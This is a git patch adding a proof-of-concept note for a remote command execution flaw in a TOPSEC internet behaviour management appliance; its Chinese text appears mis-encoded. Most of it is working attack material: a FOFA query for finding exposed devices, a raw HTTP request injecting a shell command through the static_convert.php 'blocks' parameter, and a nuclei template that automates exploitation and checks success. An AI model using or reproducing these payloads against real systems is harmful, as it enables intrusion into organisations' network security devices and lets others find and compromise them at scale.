From d17eb72fdba1c7874c99b41cd9618ade6ab5a09b Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 3 Jan 2024 19:34:24 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=A4=A9=E8=9E=8D=E4=BF=A1TOPSEC=5Fst?=
 =?UTF-8?q?atic=5Fconvert=E8=BF=9C=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7?=
 =?UTF-8?q?=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md | 50 +++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md

diff --git a/澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md b/澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md
new file mode 100644
index 0000000..da19006
--- /dev/null
+++ b/澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md
@@ -0,0 +1,50 @@
+## 澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊
+
+## fofa
+```
+app="澶╄瀺淇�-涓婄綉琛屼负绠＄悊绯荤粺"
+```
+
+## poc
+```
+GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'pstvamqlkzrgslfilwvf'%20>>%20/var/www/html/rrlmkkyopirhaviko.txt%0A HTTP/1.1
+Host: 192.168.40.130:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+
+```
+
+![46a8923aca7c87333e82efadd74cf08c](https://github.com/wy876/POC/assets/139549762/fed4855b-bedf-436b-ba41-9df02ee8ae6d)
+
+## nuclei
+```
+id: topsec-static_convert-rce
+
+info:
+  name: 澶╄瀺淇OPSEC static_convert 杩滅▼鍛戒护鎵ц婕忔礊
+  author: fgz
+  severity: critical
+  description: 澶╄瀺淇OPSEC瑙ｅ喅鏂规鍖呮嫭缁煎悎绠＄悊绯荤粺锛屽悇绫诲畨鍏ㄤ骇鍝佸闃茬伀澧欍�乂PN銆佸畨鍏ㄧ綉鍏炽�佸甯︾鐞嗐�佸叆渚垫娴嬨�佸唴瀹硅繃婊ゃ�佷釜浜哄畨鍏ㄥ浠朵互鍙婄患鍚堝畨鍏ㄥ璁＄郴缁熺瓑澶氱瀹夊叏鍔熻兘銆傝绯荤粺static_convert.php鎺ュ彛澶勫瓨鍦≧CE婕忔礊锛屼細瀵艰嚧鏈嶅姟鍣ㄥけ闄枫��
+  metadata:
+    max-request: 1
+    fofa-query: app="澶╄瀺淇�-涓婄綉琛屼负绠＄悊绯荤粺"
+    verified: true
+variables:
+  file_name: "{{to_lower(rand_text_alpha(6))}}"
+  file_content: "{{to_lower(rand_text_alpha(15))}}"
+requests:
+  - raw:
+      - |+
+        GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'{{file_content}}'%20>>%20/var/www/html/{{file_name}}.txt%0A HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+
+      - |
+        GET /{{file_name}}.txt HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
+```